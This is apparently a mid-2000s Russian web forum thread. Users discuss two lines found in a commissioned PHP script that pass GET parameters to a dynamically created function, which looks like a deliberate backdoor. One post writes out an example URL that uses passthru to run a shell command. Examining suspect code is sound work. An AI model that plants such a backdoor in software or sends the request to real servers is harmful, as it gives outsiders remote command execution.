Ошибка програмера или подстава?

[jo]

Ошибка програмера или подстава?

Знакомый кому-то заказал скрипт за wm, обговорил условия оплаты, сроки, требуемые от скрипта функции и т.д.
Переводит половину суммы, вторая половина должна быть отдана после оплаты.
В положеный срок получает скрипт, но так как сам не бум-бум, просит меня проверить работоспособность и
функциональность скрипта. Проверяю-все работает, ради спортивного интереса смотрю исходник.
Заинтересовала строка
$prefix = create_function('$template,$table','$template("$table");');
далее строк через 40 нахожу
if(isset($_GET["template"])) {$prefix($template,$table);}
Прикольно правда? Как будто на случайную ошибку не тянет, явно черный вход.
Рассудите стоит ли отдавать за ТАКОЕ оставшуюся часть денег?
Может такое быть СЛУЧАЙНЫМ рукоблудством или нет?

 

[Krishna]

А в $table что?

 

[jo]

Автор оригинала: Krishna
А в $table что?

$table больше нигде в скрипте не фигурирует

 

[Krishna]

тогда я тупой, потому что не понимаю, как это можно применять в качетсве бэкдора, учитывая что register_globals судя по всему off

 

[ONK]

Krishna, а что это ещё может быть по вашему мнению?

 

[Krishna]

ONK
Я без понятия, если честно!
Но если это нельзя (ИМХО) использовать как бэкдор - может ли это быть бэкдором?

Если я не прав и можно - укажите, как. Вместе с автором топика буду признателен. А так, в чужом коде иногда можно найти призабавнейшие вещи...

 

[jo]

Автор оригинала: Krishna
ONK
Я без понятия, если честно!
Но если это нельзя (ИМХО) использовать как бэкдор - может ли это быть бэкдором?

Если честно, уж очень не хотелось бы выкладывать на всеобщее обозрение как можно заюзать ЭТО, дабы не искушать к использованию подобного (тем более в комерческих продуктах). Попробуй http://server/script.php?template=passthru&table=ls -la
Тем более прогер в самом начале скрипта програмно проверяет register_globals on или off, значит не балбес, значит случайно не мог такой казуз допустить. Или моя логика не верна в корне ?
ONK судя по вашему ответу, вы тоже считаете это подставой а не случайностью?

-~{}~ 05.03.06 00:38:

хлоп форум порезал

http://server/script.php?template=passthru&table=ls%20-la

 

[Krishna]

jo
Еще раз, без register_globals on этот скрипт, на первый взгляд, никакого вредительства не принесет. register_globals off по умолчанию. Впрочем, я полагаю он знал, как у вас установлена эта директива.

 

[!diss]

Re: Ошибка програмера или подстава?

Автор оригинала: jo
if(isset($_GET["template"])) {$prefix($template,$table);}
Прикольно правда? Как будто на случайную ошибку не тянет, явно черный вход.

Под бэкдор можно использовать как сказал Krishna (при register_globals on).
А дальше надо смотреть другие определения $prefix . Судя по конструкциям скрипт писал не ламмер, но и не ас, так что решение вряд ли будет на поверхности ( в приведенных Вами 2-х строчках), но найти его можно. И особенно обратите внимание на функции где есть обработка $_GET?

 

[Rammstein]

Нда, вот исхищрение-то

 

[baev]

Рассудите стоит ли отдавать за ТАКОЕ оставшуюся часть денег?

Во программер попал!
Это он так оплату гарантировать хотел.
Ага. Гарантировал, блин...

За попытку «прогарантировать» его теперь законно заработанного лишить хотят.


jo, ну не заплатит Ваш знакомый — дальше что?
Аванс, я так понимаю, уже заплачен?
А скрипт теперь использовать нельзя — где гарантия, что там ещё «закладок» нет?
И что в результате? Потерянный аванс?

 

[confguru]

Ну надо чтоб $table из $_GET передавалась